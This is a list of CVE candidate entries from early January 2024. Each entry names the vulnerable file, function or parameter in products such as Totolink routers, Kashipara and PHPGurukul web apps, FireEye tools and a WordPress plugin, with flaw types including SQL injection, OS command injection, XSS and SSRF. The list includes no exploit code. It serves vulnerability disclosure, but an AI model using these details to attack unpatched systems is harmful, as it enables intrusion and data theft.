CVE 2024 324 Candidate The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles. MISC:https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517 | URL:https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517 | MISC:https://plugins.trac.wordpress.org/changeset/3022354/ | URL:https://plugins.trac.wordpress.org/changeset/3022354/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve Assigned (20240108)
CVE 2024 323 Candidate Use of a Broken or Risky Cryptographic Algorithm vulnerability in B&R Industrial Automation Automation Runtime (SDM modules). The FTP server used on the B&R Automation Runtime supports unsecure encryption mechanisms, such as SSLv3, TLSv1.0 and TLS1.1. An network-based attacker can exploit the flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected product clients. This issue affects Automation Runtime: from 14.0 before 14.93. MISC:https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf | URL:https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf Assigned (20240108)
CVE 2024 322 Candidate Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3-DEV. MISC:https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70 | URL:https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70 | MISC:https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec | URL:https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec Assigned (20240108)
CVE 2024 321 Candidate Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV. MISC:https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a | URL:https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a | MISC:https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769 | URL:https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769 Assigned (20240108)
CVE 2024 320 Candidate Cross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 319 Candidate Open Redirect vulnerability in FireEye HXTool affecting version 4.6, the exploitation of which could allow an attacker to redirect a legitimate user to a malicious page by changing the 'redirect_uri' parameter. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 318 Candidate Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 317 Candidate Cross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 316 Candidate Improper cleanup vulnerability in exceptions thrown in FireEye Endpoint Security, affecting version 5.2.0.958244. This vulnerability could allow an attacker to send multiple request packets to the containment_notify/preview parameter, which could lead to a service outage. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 315 Candidate Remote file inclusion vulnerability in FireEye Central Management affecting version 9.1.1.956704. This vulnerability allows an attacker to upload a malicious PDF file to the system during the report creation process. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 314 Candidate XSS vulnerability in FireEye Central Management affecting version 9.1.1.956704, which could allow an attacker to modify special HTML elements in the application and cause a reflected XSS, leading to a session hijacking. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products Assigned (20240108)
CVE 2024 313 Candidate A malicious insider exploiting this vulnerability can circumvent existing security controls put in place by the organization. On the contrary, if the victim is legitimately using the temporary bypass to reach out to the Internet for retrieving application and system updates, a remote device could target it and undo the bypass, thereby denying the victim access to the update service, causing it to fail. MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 Assigned (20240108)
CVE 2024 312 Candidate A malicious insider can uninstall Skyhigh Client Proxy without a valid uninstall password. MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 Assigned (20240108)
CVE 2024 311 Candidate A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code. MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418 Assigned (20240108)
CVE 2024 310 Candidate A content-security-policy vulnerability in ENS Control browser extension prior to 10.7.0 Update 15 allows a remote attacker to alter the response header parameter setting to switch the content security policy into report-only mode, allowing an attacker to bypass the content-security-policy configuration. MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10417 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10417 Assigned (20240108)
CVE 2024 308 Candidate A vulnerability was found in Inis up to 2.0.1. It has been rated as critical. This issue affects some unknown processing of the file app/api/controller/default/Proxy.php. The manipulation of the argument p_url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249875. MISC:https://note.zhaoj.in/share/2E2JG2PClHGF | URL:https://note.zhaoj.in/share/2E2JG2PClHGF | MISC:https://vuldb.com/?ctiid.249875 | URL:https://vuldb.com/?ctiid.249875 | MISC:https://vuldb.com/?id.249875 | URL:https://vuldb.com/?id.249875 Assigned (20240107)
CVE 2024 307 Candidate A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability. MISC:https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf | URL:https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf | MISC:https://vuldb.com/?ctiid.249874 | URL:https://vuldb.com/?ctiid.249874 | MISC:https://vuldb.com/?id.249874 | URL:https://vuldb.com/?id.249874 Assigned (20240107)
CVE 2024 306 Candidate A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf | MISC:https://vuldb.com/?ctiid.249873 | URL:https://vuldb.com/?ctiid.249873 | MISC:https://vuldb.com/?id.249873 | URL:https://vuldb.com/?id.249873 Assigned (20240107)
CVE 2024 305 Candidate A vulnerability was found in Guangzhou Yingke Electronic Technology Ncast up to 2017 and classified as problematic. Affected by this issue is some unknown functionality of the file /manage/IPSetup.php of the component Guest Login. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249872. MISC:https://github.com/2267787739/cve/blob/main/logic.md | URL:https://github.com/2267787739/cve/blob/main/logic.md | MISC:https://vuldb.com/?ctiid.249872 | URL:https://vuldb.com/?ctiid.249872 | MISC:https://vuldb.com/?id.249872 | URL:https://vuldb.com/?id.249872 Assigned (20240107)
CVE 2024 304 Candidate A vulnerability has been found in Youke365 up to 1.5.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /app/api/controller/collect.php. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249871. MISC:https://note.zhaoj.in/share/3jF3Xpl3ttlZ | URL:https://note.zhaoj.in/share/3jF3Xpl3ttlZ | MISC:https://vuldb.com/?ctiid.249871 | URL:https://vuldb.com/?ctiid.249871 | MISC:https://vuldb.com/?id.249871 | URL:https://vuldb.com/?id.249871 Assigned (20240107)
CVE 2024 303 Candidate A vulnerability, which was classified as critical, was found in Youke365 up to 1.5.3. Affected is an unknown function of the file /app/api/controller/caiji.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249870 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/fssH60eQkvSl | URL:https://note.zhaoj.in/share/fssH60eQkvSl | MISC:https://vuldb.com/?ctiid.249870 | URL:https://vuldb.com/?ctiid.249870 | MISC:https://vuldb.com/?id.249870 | URL:https://vuldb.com/?id.249870 Assigned (20240107)
CVE 2024 302 Candidate A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability. MISC:https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf | URL:https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf | MISC:https://vuldb.com/?ctiid.249869 | URL:https://vuldb.com/?ctiid.249869 | MISC:https://vuldb.com/?id.249869 | URL:https://vuldb.com/?id.249869 Assigned (20240107)
CVE 2024 301 Candidate A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868. MISC:https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf | URL:https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf | MISC:https://vuldb.com/?ctiid.249868 | URL:https://vuldb.com/?ctiid.249868 | MISC:https://vuldb.com/?id.249868 | URL:https://vuldb.com/?id.249868 Assigned (20240107)
CVE 2024 300 Candidate A vulnerability was found in Beijing Baichuo Smart S150 Management Platform up to 20240101. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php of the component HTTP POST Request Handler. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/tolkent/cve/blob/main/upload.md | URL:https://github.com/tolkent/cve/blob/main/upload.md | MISC:https://vuldb.com/?ctiid.249866 | URL:https://vuldb.com/?ctiid.249866 | MISC:https://vuldb.com/?id.249866 | URL:https://vuldb.com/?id.249866 Assigned (20240107)
CVE 2024 299 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249865 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md | MISC:https://vuldb.com/?ctiid.249865 | URL:https://vuldb.com/?ctiid.249865 | MISC:https://vuldb.com/?id.249865 | URL:https://vuldb.com/?id.249865 Assigned (20240107)
CVE 2024 298 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. Affected is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249864. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md | MISC:https://vuldb.com/?ctiid.249864 | URL:https://vuldb.com/?ctiid.249864 | MISC:https://vuldb.com/?id.249864 | URL:https://vuldb.com/?id.249864 Assigned (20240107)
CVE 2024 297 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md | MISC:https://vuldb.com/?ctiid.249863 | URL:https://vuldb.com/?ctiid.249863 | MISC:https://vuldb.com/?id.249863 | URL:https://vuldb.com/?id.249863 Assigned (20240107)
CVE 2024 296 Candidate A vulnerability has been found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This vulnerability affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument host_time leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249862 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md | MISC:https://vuldb.com/?ctiid.249862 | URL:https://vuldb.com/?ctiid.249862 | MISC:https://vuldb.com/?id.249862 | URL:https://vuldb.com/?id.249862 Assigned (20240107)
CVE 2024 295 Candidate A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. This affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249861 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md | MISC:https://vuldb.com/?ctiid.249861 | URL:https://vuldb.com/?ctiid.249861 | MISC:https://vuldb.com/?id.249861 | URL:https://vuldb.com/?id.249861 Assigned (20240107)
CVE 2024 294 Candidate A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this issue is the function setUssd of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ussd leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249860. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md | MISC:https://vuldb.com/?ctiid.249860 | URL:https://vuldb.com/?ctiid.249860 | MISC:https://vuldb.com/?id.249860 | URL:https://vuldb.com/?id.249860 Assigned (20240107)
CVE 2024 293 Candidate A vulnerability classified as critical was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this vulnerability is the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249859. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md | MISC:https://vuldb.com/?ctiid.249859 | URL:https://vuldb.com/?ctiid.249859 | MISC:https://vuldb.com/?id.249859 | URL:https://vuldb.com/?id.249859 Assigned (20240107)
CVE 2024 292 Candidate A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249858 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md | MISC:https://vuldb.com/?ctiid.249858 | URL:https://vuldb.com/?ctiid.249858 | MISC:https://vuldb.com/?id.249858 | URL:https://vuldb.com/?id.249858 Assigned (20240107)
CVE 2024 291 Candidate A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249857 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md | MISC:https://vuldb.com/?ctiid.249857 | URL:https://vuldb.com/?ctiid.249857 | MISC:https://vuldb.com/?id.249857 | URL:https://vuldb.com/?id.249857 Assigned (20240107)
CVE 2024 290 Candidate A vulnerability, which was classified as critical, has been found in Kashipara Food Management System 1.0. This issue affects some unknown processing of the file stock_edit.php. The manipulation of the argument item_type leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249851. MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md | URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md | MISC:https://vuldb.com/?ctiid.249851 | URL:https://vuldb.com/?ctiid.249851 | MISC:https://vuldb.com/?id.249851 | URL:https://vuldb.com/?id.249851 Assigned (20240107)
CVE 2024 289 Candidate A vulnerability classified as critical was found in Kashipara Food Management System 1.0. This vulnerability affects unknown code of the file stock_entry_submit.php. The manipulation of the argument itemype leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249850 is the identifier assigned to this vulnerability. MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md | URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md | MISC:https://vuldb.com/?ctiid.249850 | URL:https://vuldb.com/?ctiid.249850 | MISC:https://vuldb.com/?id.249850 | URL:https://vuldb.com/?id.249850 Assigned (20240107)
CVE 2024 288 Candidate A vulnerability classified as critical has been found in Kashipara Food Management System 1.0. This affects an unknown part of the file rawstock_used_damaged_submit.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249849 was assigned to this vulnerability. MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md | URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md | MISC:https://vuldb.com/?ctiid.249849 | URL:https://vuldb.com/?ctiid.249849 | MISC:https://vuldb.com/?id.249849 | URL:https://vuldb.com/?id.249849 Assigned (20240107)
CVE 2024 287 Candidate A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848. MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md | URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md | MISC:https://vuldb.com/?ctiid.249848 | URL:https://vuldb.com/?ctiid.249848 | MISC:https://vuldb.com/?id.249848 | URL:https://vuldb.com/?id.249848 Assigned (20240107)
CVE 2024 286 Candidate A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file index.php#contact_us of the component Contact Form. The manipulation of the argument Name/Email/Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249843. MISC:https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing | URL:https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing | MISC:https://vuldb.com/?ctiid.249843 | URL:https://vuldb.com/?ctiid.249843 | MISC:https://vuldb.com/?id.249843 | URL:https://vuldb.com/?id.249843 Assigned (20240106)
CVE 2024 284 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as problematic. This issue affects some unknown processing of the file party_submit.php. The manipulation of the argument party_address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249839. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf | MISC:https://vuldb.com/?ctiid.249839 | URL:https://vuldb.com/?ctiid.249839 | MISC:https://vuldb.com/?id.249839 | URL:https://vuldb.com/?id.249839 Assigned (20240106)
CVE 2024 283 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file party_details.php. The manipulation of the argument party_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249838 is the identifier assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf | MISC:https://vuldb.com/?ctiid.249838 | URL:https://vuldb.com/?ctiid.249838 | MISC:https://vuldb.com/?id.249838 | URL:https://vuldb.com/?id.249838 Assigned (20240106)
CVE 2024 282 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as problematic. This affects an unknown part of the file addmaterialsubmit.php. The manipulation of the argument tin leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249837 was assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf | MISC:https://vuldb.com/?ctiid.249837 | URL:https://vuldb.com/?ctiid.249837 | MISC:https://vuldb.com/?id.249837 | URL:https://vuldb.com/?id.249837 Assigned (20240106)
CVE 2024 281 Candidate A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf | MISC:https://vuldb.com/?ctiid.249836 | URL:https://vuldb.com/?ctiid.249836 | MISC:https://vuldb.com/?id.249836 | URL:https://vuldb.com/?id.249836 Assigned (20240106)
CVE 2024 280 Candidate A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file item_type_submit.php. The manipulation of the argument type_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249835. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf | MISC:https://vuldb.com/?ctiid.249835 | URL:https://vuldb.com/?ctiid.249835 | MISC:https://vuldb.com/?id.249835 | URL:https://vuldb.com/?id.249835 Assigned (20240106)
CVE 2024 279 Candidate A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. Affected is an unknown function of the file item_list_edit.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249834 is the identifier assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf | MISC:https://vuldb.com/?ctiid.249834 | URL:https://vuldb.com/?ctiid.249834 | MISC:https://vuldb.com/?id.249834 | URL:https://vuldb.com/?id.249834 Assigned (20240106)
CVE 2024 278 Candidate A vulnerability, which was classified as critical, has been found in Kashipara Food Management System up to 1.0. This issue affects some unknown processing of the file partylist_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249833 was assigned to this vulnerability. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf | MISC:https://vuldb.com/?ctiid.249833 | URL:https://vuldb.com/?ctiid.249833 | MISC:https://vuldb.com/?id.249833 | URL:https://vuldb.com/?id.249833 Assigned (20240106)
CVE 2024 277 Candidate A vulnerability classified as critical was found in Kashipara Food Management System up to 1.0. This vulnerability affects unknown code of the file party_submit.php. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249832. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf | MISC:https://vuldb.com/?ctiid.249832 | URL:https://vuldb.com/?ctiid.249832 | MISC:https://vuldb.com/?id.249832 | URL:https://vuldb.com/?id.249832 Assigned (20240106)
CVE 2024 276 Candidate A vulnerability classified as critical has been found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file rawstock_used_damaged_smt.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249831. MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf | MISC:https://vuldb.com/?ctiid.249831 | URL:https://vuldb.com/?ctiid.249831 | MISC:https://vuldb.com/?id.249831 | URL:https://vuldb.com/?id.249831 Assigned (20240106)
